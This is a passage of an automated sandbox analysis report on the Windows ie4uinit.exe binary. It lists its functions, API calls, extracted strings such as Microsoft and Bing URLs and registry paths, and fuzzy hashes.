GetLastError.KERNEL32 ref: 00007FF6B5223A2A
GetLastError.KERNEL32 ref: 00007FF6B5223A39
#74.IERTUTIL ref: 00007FF6B5223A6F
ReleaseMutex.KERNEL32 ref: 00007FF6B5223A9B

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$MutexObjectReleaseSingleWait
String ID:
API String ID: 3488842590-0
Opcode ID: 72630aa3288f511306bac9450482be0dd7f32d28d8b1f85fcbea46afe0c7ed76
Instruction ID: 18257e9c7130b742edcdb8e1dcfee436b55f65c8848ffaa6c09015f67779dc69
Opcode Fuzzy Hash: 72630aa3288f511306bac9450482be0dd7f32d28d8b1f85fcbea46afe0c7ed76
Instruction Fuzzy Hash: 2721CF25B1AB4249FB149B6EAF803B9B294AF54F90F044138DB5DC669AEF3DEC424300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5233F30 Relevance: 9.0, APIs: 6, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF6B52338A9), ref: 00007FF6B5233F61
GetCurrentProcessId.KERNEL32(?,?,?,00007FF6B52338A9), ref: 00007FF6B5233F6F
GetCurrentThreadId.KERNEL32 ref: 00007FF6B5233F7B
GetTickCount.KERNEL32 ref: 00007FF6B5233F87
GetTickCount.KERNEL32 ref: 00007FF6B5233F97
QueryPerformanceCounter.KERNEL32(?,?,?,00007FF6B52338A9), ref: 00007FF6B5233FB2

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: 4aac9e0af9f426e54d478a5ad2f8f5328a72a4dcf3b7aefea67b7d74eefd4843
Instruction ID: 756658a8e57b980cc7f9c601d27466b173ecf4407a4eb48f4a758aa4f7d5c933
Opcode Fuzzy Hash: 4aac9e0af9f426e54d478a5ad2f8f5328a72a4dcf3b7aefea67b7d74eefd4843
Instruction Fuzzy Hash: FA113B22606F418AEB10DF64ED451A833A4FB08B58B401A35EB6D87B59EF3CE9658340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522F8CC Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

#793.IERTUTIL(?,?,?,00007FF6B5211117), ref: 00007FF6B522F8F0
#791.IERTUTIL(?,?,?,00007FF6B5211117), ref: 00007FF6B522F8FD
#791.IERTUTIL(?,?,?,00007FF6B5211117), ref: 00007FF6B522F913
#597.IERTUTIL(?,?,?,00007FF6B5211117), ref: 00007FF6B522F91D
#594.IERTUTIL(?,?,?,00007FF6B5211117), ref: 00007FF6B522F927
#398.IERTUTIL(?,?,?,00007FF6B5211117), ref: 00007FF6B522F931

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: #791$#398#594#597#793
String ID:
API String ID: 1768570115-0
Opcode ID: 3a0599031467f5ca40ba1caf257b0c025dbfb019dc45839994e4534930ebf393
Instruction ID: 1295d0ac5c9abc24bc8fc720702ba71775b21d966c1c2e224b8e37f7a37905cd
Opcode Fuzzy Hash: 3a0599031467f5ca40ba1caf257b0c025dbfb019dc45839994e4534930ebf393
Instruction Fuzzy Hash: 2411A069D1E68396FA205B586E852F82354AF04F80F150430DB899725BDE3DBC8A8601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52311BC Relevance: 9.0, APIs: 6, Instructions: 44threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00007FF6B52311CD
OpenThreadToken.ADVAPI32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52311E0
GetLastError.KERNEL32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B52311EA
GetCurrentProcess.KERNEL32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231210
OpenProcessToken.ADVAPI32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B5231221
GetLastError.KERNEL32(?,?,?,00007FF6B5231271,?,?,?,?,?,?,?,?,00000000,00007FF6B5230FF9), ref: 00007FF6B523122F

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CurrentErrorLastOpenProcessThreadToken
String ID:
API String ID: 4013858454-0
Opcode ID: e7078a2e127753b83308feb79ad805bb6b5e0d0d91dabb846eb6c4fc2db20935
Instruction ID: 03214e6f280e22ec43225fcfaf428e74f5ed9b2971dacf24c83d71647446451d
Opcode Fuzzy Hash: e7078a2e127753b83308feb79ad805bb6b5e0d0d91dabb846eb6c4fc2db20935
Instruction Fuzzy Hash: 74015221B16B138AFB685B6A9F653B921D4AF48F40F14413DDA4FCA196EE3CE8454200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522E150 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 270COMMON

Download Yara Rule

APIs

StrCmpNIA.SHLWAPI ref: 00007FF6B522E214
EnterCriticalSection.KERNEL32 ref: 00007FF6B522E3F7
LeaveCriticalSection.KERNEL32 ref: 00007FF6B522E419

Part of subcall function 00007FF6B522F3B8: QueueUserWorkItem.KERNEL32 ref: 00007FF6B522F3D7

CreateUri.URLMON ref: 00007FF6B522E2C6

Part of subcall function 00007FF6B5211698: GetProcessHeap.KERNEL32 ref: 00007FF6B52116A5
Part of subcall function 00007FF6B5211698: HeapFree.KERNEL32 ref: 00007FF6B52116B3

Strings

https://, xrefs: 00007FF6B522E20D

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CriticalHeapSection$CreateEnterFreeItemLeaveProcessQueueUserWork
String ID: https://
API String ID: 2263833432-4275131719
Opcode ID: 8888d486f500b6f11ff04df45abe5502008c35d4091c926cecfe9cd506a0d2bb
Instruction ID: f7221a9e05135d5c715620706e494f03011093b851a8379e3cbf744fb62ed360
Opcode Fuzzy Hash: 8888d486f500b6f11ff04df45abe5502008c35d4091c926cecfe9cd506a0d2bb
Instruction Fuzzy Hash: E9C16C26A1AB4689FB10DF69DA003FD27A5BB48B88F540035DF4D9778ADF3AE815D340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522CE8C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32 ref: 00007FF6B522CEDA
GetLastError.KERNEL32 ref: 00007FF6B522CEE4
GetLastError.KERNEL32 ref: 00007FF6B522CEF4

Strings

'g, xrefs: 00007FF6B522D118

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FileSize
String ID: 'g
API String ID: 3064237074-1221219425
Opcode ID: fc0183ddfc06f209351b9f25150bff5038a636a68cce1115c136ad73e2915022
Instruction ID: 135e5a0eed6da430a8eb7b9bb54dbf402c6b0dcc3af1886b0c4045e7d120dee2
Opcode Fuzzy Hash: fc0183ddfc06f209351b9f25150bff5038a636a68cce1115c136ad73e2915022
Instruction Fuzzy Hash: 40A14375A1D2428BE7748F1DAA806AA76A0FB44B40F504139DB4DD7B9ACF7EFC058B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5225D60 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF6B5225D8C
SysFreeString.OLEAUT32 ref: 00007FF6B5225DB8
SysFreeString.OLEAUT32 ref: 00007FF6B5225EE7

Strings

signvalue, xrefs: 00007FF6B5225D85
https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP, xrefs: 00007FF6B5225E66

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$Alloc
String ID: https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP$signvalue
API String ID: 986138563-2343436192
Opcode ID: dba4a3257a411f83e16d9ee2fe00b5a5a04a996c1f5c36b0e1ba40adfbd57730
Instruction ID: 9e4ac39edf22e9f6884595d92c5eacadd79236e5a36ff3cb098102bc1201c4eb
Opcode Fuzzy Hash: dba4a3257a411f83e16d9ee2fe00b5a5a04a996c1f5c36b0e1ba40adfbd57730
Instruction Fuzzy Hash: 73515C36A2AB4586EB14CF19EA443AD7364FB84F80F158035DB9D8BB59DF3AE850C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5229F60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF6B5229F95

Part of subcall function 00007FF6B5211440: SysStringLen.OLEAUT32 ref: 00007FF6B521148B

SysStringLen.OLEAUT32 ref: 00007FF6B5229FBD

Part of subcall function 00007FF6B5211440: SysAllocStringLen.OLEAUT32 ref: 00007FF6B52114AB
Part of subcall function 00007FF6B5211440: SysStringLen.OLEAUT32 ref: 00007FF6B52114BC
Part of subcall function 00007FF6B5211440: memcpy_s.MSVCRT ref: 00007FF6B52114D8
Part of subcall function 00007FF6B5211440: memcpy_s.MSVCRT ref: 00007FF6B521150A
Part of subcall function 00007FF6B5211440: SysFreeString.OLEAUT32 ref: 00007FF6B5211533

SysFreeString.OLEAUT32 ref: 00007FF6B5229FE9
SysFreeString.OLEAUT32 ref: 00007FF6B5229FFC

Strings

bing.com, xrefs: 00007FF6B522A478

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$Allocmemcpy_s
String ID: bing.com
API String ID: 3413315342-724857623
Opcode ID: 4df21d376d5b1f6e8b3e20dac3d6bf2d13ec4efa04ce40dc0dc24df029a2cd91
Instruction ID: 66b4ca0817ff4289e30b5a65a3ce9dc7c094064aa6c2484f87392fadcc1d44ad
Opcode Fuzzy Hash: 4df21d376d5b1f6e8b3e20dac3d6bf2d13ec4efa04ce40dc0dc24df029a2cd91
Instruction Fuzzy Hash: 35112E26A19B9282DB10DF5AEA450AA63A4FB84FD0B154031EF4DC7B59EF3EEC51C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521CD94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52synchronizationwindowCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?,00000001,00007FF6B521CBA8), ref: 00007FF6B521CDB4
GetLastError.KERNEL32(?,?,00000001,00007FF6B521CBA8), ref: 00007FF6B521CDBD
PostMessageW.USER32 ref: 00007FF6B521CE00
GetLastError.KERNEL32 ref: 00007FF6B521CE0A

Strings

{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}, xrefs: 00007FF6B521CDA6

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CreateMessageMutexPost
String ID: {66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}
API String ID: 1064731545-2535197689
Opcode ID: 4017a3f4ecfa0a10bd8e2cdc9bb2fded74f5b7b853e45b618559c013d7d5803b
Instruction ID: c26c6a329ad51d7850ba2f8862f1aeba3be2ce5c353dbdae811a79d04d00e622
Opcode Fuzzy Hash: 4017a3f4ecfa0a10bd8e2cdc9bb2fded74f5b7b853e45b618559c013d7d5803b
Instruction Fuzzy Hash: 67114F25B09B5286EB148B6EEA842AA62A1FB88F80F544031DB4DC7769DF3DEC418710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5214408 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211394: _vsnwprintf.MSVCRT ref: 00007FF6B52113D4

SHGetValueW.SHLWAPI ref: 00007FF6B5214480
SHSetValueW.SHLWAPI ref: 00007FF6B52144BB

Strings

{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF6B521442C
Attributes, xrefs: 00007FF6B5214460, 00007FF6B52144A3
Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\%s\ShellFolder, xrefs: 00007FF6B521443D

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Value$_vsnwprintf
String ID: Attributes$Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\%s\ShellFolder${871C5380-42A0-1069-A2EA-08002B30309D}
API String ID: 2219702684-1335838630
Opcode ID: 15015be8bc8c992df1deb76da336cd0d55baeacf5d82627b624701718af539a2
Instruction ID: b2cf55630e05fdd7b899c435fef9dae9b41fbbc846e223a38f8ffadd25d9d07d
Opcode Fuzzy Hash: 15015be8bc8c992df1deb76da336cd0d55baeacf5d82627b624701718af539a2
Instruction Fuzzy Hash: 65115E72619B8186DB208F14F9853DA7360FB88B54F401122EB9D43B9DCF7CD504CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5213694 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 00007FF6B52136CE
SHGetValueW.SHLWAPI ref: 00007FF6B5213717

Strings

system\Setup, xrefs: 00007FF6B52136BA, 00007FF6B5213704
UpgradeInProgress, xrefs: 00007FF6B52136F5
SystemSetupInProgress, xrefs: 00007FF6B52136AC

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Value
String ID: SystemSetupInProgress$UpgradeInProgress$system\Setup
API String ID: 3702945584-4024946984
Opcode ID: 25aa09b4bff389396c7e737f2b133597983661c616a4b6ef15dfb7e3b1ddaa29
Instruction ID: 3ea9fa203413cfb59fa2d35a00f83b2106f2aeb02f42f1947aec7cfc47fba879
Opcode Fuzzy Hash: 25aa09b4bff389396c7e737f2b133597983661c616a4b6ef15dfb7e3b1ddaa29
Instruction Fuzzy Hash: 051151B160AB418AEB208B28ED846E673A4FB54B54F600135D75C86799DF3EDD49CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B521251C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FF6B5212547
GetLastError.KERNEL32 ref: 00007FF6B5212551
GetEnvironmentVariableW.KERNEL32 ref: 00007FF6B521256D

Strings

INSTALLER_WINNING_COMPONENT_IDENTITY, xrefs: 00007FF6B5212540
INSTALLER_SHADOWED_COMPONENT_IDENTITY, xrefs: 00007FF6B5212566

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: EnvironmentVariable$ErrorLast
String ID: INSTALLER_SHADOWED_COMPONENT_IDENTITY$INSTALLER_WINNING_COMPONENT_IDENTITY
API String ID: 1936246020-224403506
Opcode ID: c32d00b1ff9a59981e802eb6da6c82e493c4de07fe85d835931ed2be4d7c1337
Instruction ID: 71abb257b5014a6ae773420ca12c8ac03ba0f205a26aa32d8e0e9af57049d686
Opcode Fuzzy Hash: c32d00b1ff9a59981e802eb6da6c82e493c4de07fe85d835931ed2be4d7c1337
Instruction Fuzzy Hash: 14F0FF60B2A54295FB709B19EEA43E92264BF48F44F810031DB4DCA59AEE3DE905C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522AF98 Relevance: 7.7, APIs: 5, Instructions: 165timesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF6B5215599), ref: 00007FF6B522B0AD
GetSystemTime.KERNEL32 ref: 00007FF6B522B0FB
SystemTimeToFileTime.KERNEL32 ref: 00007FF6B522B10B
SetFileTime.KERNEL32 ref: 00007FF6B522B139
WaitForSingleObject.KERNEL32 ref: 00007FF6B522B14B

Part of subcall function 00007FF6B522B7AC: ReleaseMutex.KERNEL32(?,?,?,00007FF6B522DB48), ref: 00007FF6B522B7B6
Part of subcall function 00007FF6B522B7AC: GetLastError.KERNEL32(?,?,?,00007FF6B522DB48), ref: 00007FF6B522B7C2
Part of subcall function 00007FF6B522B7AC: GetLastError.KERNEL32(?,?,?,00007FF6B522DB48), ref: 00007FF6B522B7D4

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Time$ErrorFileLastObjectSingleSystemWait$HeapMutexProcessRelease
String ID:
API String ID: 3489531144-0
Opcode ID: add6bde62feadada3e36eda342627bb0098706c843400ebf0e271f96f4639e9f
Instruction ID: 3d0daeb30741cf49eb7591f2bc5c0d36d15f88eb633cefc12f32089851265539
Opcode Fuzzy Hash: add6bde62feadada3e36eda342627bb0098706c843400ebf0e271f96f4639e9f
Instruction Fuzzy Hash: F261632972AB8681E7509B299E802F96794EF44F84F404039DB5DC779BDF7EE855C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5223F18 Relevance: 7.7, APIs: 5, Instructions: 161COMMON

Download Yara Rule

APIs

CoTaskMemFree.OLE32(?,00000000,?,00007FF6B521D223), ref: 00007FF6B5224032
SHStrDupW.SHLWAPI(?,00000000,?,00007FF6B521D223), ref: 00007FF6B522403E
CoTaskMemFree.OLE32(?,00000000,?,00007FF6B521D223), ref: 00007FF6B5224060
SHStrDupW.SHLWAPI(?,00000000,?,00007FF6B521D223), ref: 00007FF6B522406C
memcpy_s.MSVCRT ref: 00007FF6B52240AE

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: FreeTask$memcpy_s
String ID:
API String ID: 3307904802-0
Opcode ID: 3f760f84861f5d6caceec0fe362b45a281db3f278ff81ce3a649680f74c1f6bc
Instruction ID: fb6d531def9e89521b7b512f36db2201ae82f9e69a801c9724aed7bd94a43092
Opcode Fuzzy Hash: 3f760f84861f5d6caceec0fe362b45a281db3f278ff81ce3a649680f74c1f6bc
Instruction Fuzzy Hash: 0C610A3AA1A7068BEA649B1ADA843A973A0FB48F40F040135DB4D87B56DF3EF850C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5217EB4 Relevance: 7.6, APIs: 5, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6B5217F91
HeapAlloc.KERNEL32 ref: 00007FF6B5217FA2
GetProcessHeap.KERNEL32 ref: 00007FF6B5217FB0
HeapFree.KERNEL32 ref: 00007FF6B5217FBF
memcpy_s.MSVCRT ref: 00007FF6B5218059

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Heap$Process$AllocFreememcpy_s
String ID:
API String ID: 3519707287-0
Opcode ID: 0688227eddbec96dc8be69fe47e3705afca657c4fc4a91d451f7dcf8b22f053c
Instruction ID: dc17bfc595947945145324f1115961116bcc090793e4abd878ec0fc6f919d6b8
Opcode Fuzzy Hash: 0688227eddbec96dc8be69fe47e3705afca657c4fc4a91d451f7dcf8b22f053c
